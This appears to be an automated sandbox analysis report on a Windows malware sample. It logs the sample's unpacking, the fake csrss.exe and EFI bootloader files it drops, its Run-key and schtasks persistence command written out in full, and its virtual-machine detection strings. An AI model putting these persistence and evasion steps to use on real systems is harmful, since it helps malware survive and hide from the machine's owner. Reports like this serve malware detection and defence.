Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 17.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 31.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 33.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 39.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 52.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 52.2.csrss.exe.400000.3.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 17.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 31.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 33.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 39.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 52.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;

Source: injector.exe.17.dr	Static PE information: section name: _RDATA
Source: windefender.exe.17.dr	Static PE information: section name: UPX2
Source: bootmgfw.efi.17.dr	Static PE information: section name: .xdata
Source: bootx64.efi.17.dr	Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.17.dr	Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.17.dr	Static PE information: section name: _RDATA

Source: windefender.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: bootx64.efi.17.dr	Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: NtQuerySystemInformationHook.dll.17.dr	Static PE information: real checksum: 0x0 should be: 0x2279d
Source: csrss.exe.12.dr	Static PE information: real checksum: 0x45a4d9 should be: 0x45c023
Source: EfiGuardDxe.efi.17.dr	Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: injector.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: 1dyvctHqv1.exe	Static PE information: real checksum: 0x45a4d9 should be: 0x45c023
Source: bootmgfw.efi.17.dr	Static PE information: real checksum: 0x2199 should be: 0x4c78

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Creates files in the system32 config directory

Show sources

Source: C:\Windows\System32\netsh.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\fodhelper.exe

Executable created and started: C:\Windows\rss\csrss.exe

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

File created: C:\Windows\rss\csrss.exe

Jump to dropped file

Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file

Source: C:\Windows\rss\csrss.exe	File created: B:\EFI\Boot\old.efi (copy)	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File created: C:\Windows\rss\csrss.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Windows\windefender.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: B:\EFI\Microsoft\Boot\fw.efi (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File created: C:\Windows\rss\csrss.exe			Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Windows\windefender.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\rss\csrss.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke

Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke			Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: KeServiceDescriptorTable

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: VMUSRVC.EXE
Source: csrss.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: SHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXE1DYVCTHQV1.EXESHAREDINTAPP.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXE1DYVCTHQV1.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXESERVICES.EXELSASS.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXEDWM.EXESVCHOST.EXEC:\WINDOWSPATHEXTNUL
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: VMXNET[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
